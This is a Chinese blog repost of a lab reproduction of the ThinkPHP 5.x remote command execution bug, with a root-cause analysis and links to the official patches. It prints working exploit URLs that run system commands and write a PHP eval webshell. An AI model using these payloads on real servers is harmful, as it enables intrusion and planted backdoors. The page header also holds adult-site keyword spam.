日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程语言 > php >内容正文

php

【漏洞复现】ThinkPHP5 5.x 远程命令执行(getshell)

發布時間:2025/6/15 php 26 豆豆
生活随笔 收集整理的這篇文章主要介紹了 【漏洞复现】ThinkPHP5 5.x 远程命令执行(getshell) 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

0x00復現環境

ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 遠程命令執行漏洞利用(GetShell)

0x01步驟

  • 點擊start to hack 進入環境頁面 run the project 然后訪問給出的target address
    執行系統命令顯示目錄下文件
    http://aaa.vsplate.me:52763/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l

  • 執行phpinfo
    http://aaa.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'

  • 寫shell

    http://aaa.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22code%22])?^%3E%3Eshell.php
    想你所想,發揮創意

    • 0x02漏洞原理分析

    關鍵代碼


    在修復之前程序未對控制器進行過濾,導致攻 擊 者可以通過引入 \ 符號來調用任意類方法。

    $this -> app -> controller 方法來實例化控制器,然后調用實例中的方法。
    follow the controller method:thinkphp/library/think/App.php

    通過parseModuleAndClass方法解析出$module和$class,實例化$class。

    thinkphp / library / think /App.php


    當$name以反斜線\開始時直接將其作為類名。
    利用命名空間的特點,如果可以控制此處的$name(即路由中的controller部分),那么就可以實例化任何一個類。

    thinkphp/library/think/route/Rule.php
    往回看路由解析的代碼,其中route/dispatch/Url.php:: parseUrl方法調用了route/Rule.php:: parseUrlPath來解析pathinfo中的路由信息

    route/dispatch/Url.php

    route/Rule.php


    使用/對$url進行分割,未進行任何過濾。

    路由url從Request::path()中獲取

    其中,我們來看一下pathinfo函數

    由于var_pathinfo的默認配置為s,我們可利用$_GET['s']來傳遞路由信息,也可利用pathinfo來傳遞
    但測試時windows環境下會將$_SERVER['pathinfo']中的\替換為/。結合前面分析可得初步利用代碼如下:
    index.php?s=index/\namespace\class/method
    這將會實例化\namespace\class類并執行method方法

    0x03 漏洞PoC

    使用的是pocsuite框架

    0x04 漏洞修復

    Thinkphp v5.0.x補丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f

    Thinkphp v5.1.x補丁地址: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815

    0x05 漏洞利用(目前出現的***手段)

    威脅預警 | ThinkPHP v5新漏洞***案例首曝光

    0x06 reference

    http://www.vulnspy.com/cn-thinkphp-5.x-rce/thinkphp_5.x_(v5.0.23%E5%8F%8Av5.1.31%E4%BB%A5%E4%B8%8B%E7%89%88%E6%9C%AC)_%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%EF%BC%88getshell%EF%BC%89/

    【2019-1-24更新】發現大佬們的動態調試 下一個復現可以試一試

    轉載于:https://blog.51cto.com/11834557/2328927

    總結

    以上是生活随笔為你收集整理的【漏洞复现】ThinkPHP5 5.x 远程命令执行(getshell)的全部內容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。